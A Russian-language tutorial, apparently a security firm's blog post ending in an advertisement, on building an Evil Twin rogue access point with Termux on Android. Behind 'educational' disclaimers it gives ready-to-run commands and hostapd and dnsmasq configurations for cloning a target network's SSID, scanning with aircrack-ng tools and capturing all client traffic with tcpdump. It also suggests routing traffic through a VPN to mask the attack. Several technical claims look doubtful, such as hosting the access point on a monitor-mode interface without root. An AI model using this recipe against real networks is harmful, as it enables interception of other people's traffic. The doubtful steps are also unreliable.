В данной статье мы рассмотрим создание автономного Wi-Fi Pineapple на устройстве Android с использованием Termux. Цель статьи – исключительно образовательная: демонстрация принципов работы атак типа Evil Twin и перехвата трафика для анализа безопасности беспроводных сетей. Важно понимать, что несанкционированный доступ к чужим сетям и перехват данных преследуется по закону. Все действия выполняются в рамках тестирования собственной сети или с письменного разрешения владельца сети.
Необходимые инструменты и подготовка
Для реализации потребуется:
- Устройство Android с поддержкой Wi-Fi мониторного режима (root не требуется, но может упростить настройку).
- Приложение Termux, установленное из F-Droid (рекомендуется) или Google Play.
- Wi-Fi адаптер, поддерживающий режим монитора (встроенный или внешний).
- Несколько пакетов для Termux (установка описана ниже).
Важно: Перед началом убедитесь, что вы соблюдаете все применимые законы и нормативные акты. Использование данной информации для несанкционированных действий является незаконным.
Установка необходимых пакетов
После установки Termux, необходимо обновить пакеты и установить требуемые инструменты. Выполните следующие команды в Termux:
apt update && apt upgrade
pkg install nmap aircrack-ng dnsmasq hostapd busybox-httpd tcpdump
Пояснения:
- nmap – сканер сети.
- aircrack-ng – набор инструментов для взлома Wi-Fi.
- dnsmasq – DNS и DHCP сервер.
- hostapd – демон доступа к беспроводной сети (точка доступа).
- busybox-httpd – простой HTTP сервер.
- tcpdump – сниффер трафика.
Включение Wi-Fi мониторного режима
Для включения мониторного режима необходимо выполнить следующие действия. Внимание: команды могут отличаться в зависимости от модели устройства Android.
airmon-ng check kill
airmon-ng start wlan0
После выполнения этих команд появится новый интерфейс, обычно wlan0mon. Используйте его для дальнейших операций.
Сканирование беспроводных сетей
Используйте airodump-ng для сканирования доступных Wi-Fi сетей:
airodump-ng wlan0mon
Эта команда отобразит список доступных сетей, их BSSID, канал и другую информацию. Запомните BSSID целевой сети (если проводите тестирование на своей сети).
Атака Evil Twin
Атака Evil Twin заключается в создании поддельной точки доступа с тем же SSID, что и целевая сеть. Это вынуждает устройства клиентов подключаться к поддельной точке доступа, позволяя перехватывать трафик.
Настройка hostapd:
Создайте файл конфигурации hostapd.conf с содержимым, подобным следующему (замените значения на свои):
interface=wlan0mon
driver=nl80211
ssid=Имя_целевой_сети
channel=Канал_целевой_сети
wpa_passphrase=Пароль_целевой_сети
wpa=2
auth_algs=1
macaddr_acl=0
ignore_broadcast_ssid=0
Запустите hostapd:
hostapd hostapd.conf
Настройка dnsmasq:
Создайте файл конфигурации dnsmasq.conf:
interface=wlan0mon
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,12h
dhcp-option=option:router,192.168.4.1
dhcp-authoritative
server=8.8.8.8
server=8.8.4.4
log-queries
log-dhcp
Запустите dnsmasq:
dnsmasq -C dnsmasq.conf
Настройка переадресации трафика (IP Forwarding):
sysctl -w net.ipv4.ip_forward=1
Для создания локальной сети можно использовать VPN-сервер, настроенный на устройстве Android (например, OpenVPN), чтобы перенаправлять трафик через себя, маскируя атаку.
Перехват трафика
Используйте tcpdump для перехвата трафика:
tcpdump -i wlan0mon -w capture.pcap
Эта команда сохранит весь перехваченный трафик в файл capture.pcap, который можно проанализировать с помощью Wireshark или других инструментов.
Заключение
В данной статье мы рассмотрели основные этапы создания автономного Wi-Fi Pineapple на Android с использованием Termux. Помните, что данная информация предоставлена исключительно в образовательных целях и не должна использоваться для незаконных действий. Всегда соблюдайте законодательство и проводите тестирование только в рамках своей сети или с разрешения владельца.
РыбинскЛАБ предоставляет услуги по аудиту информационной безопасности, включая тестирование на проникновение и анализ уязвимостей беспроводных сетей. Мы поможем вам выявить слабые места в вашей инфраструктуре и защитить ваши данные. Обратитесь к нам для получения профессиональной консультации и помощи в обеспечении безопасности вашей сети. Подробности на https://rybinsklab.ru.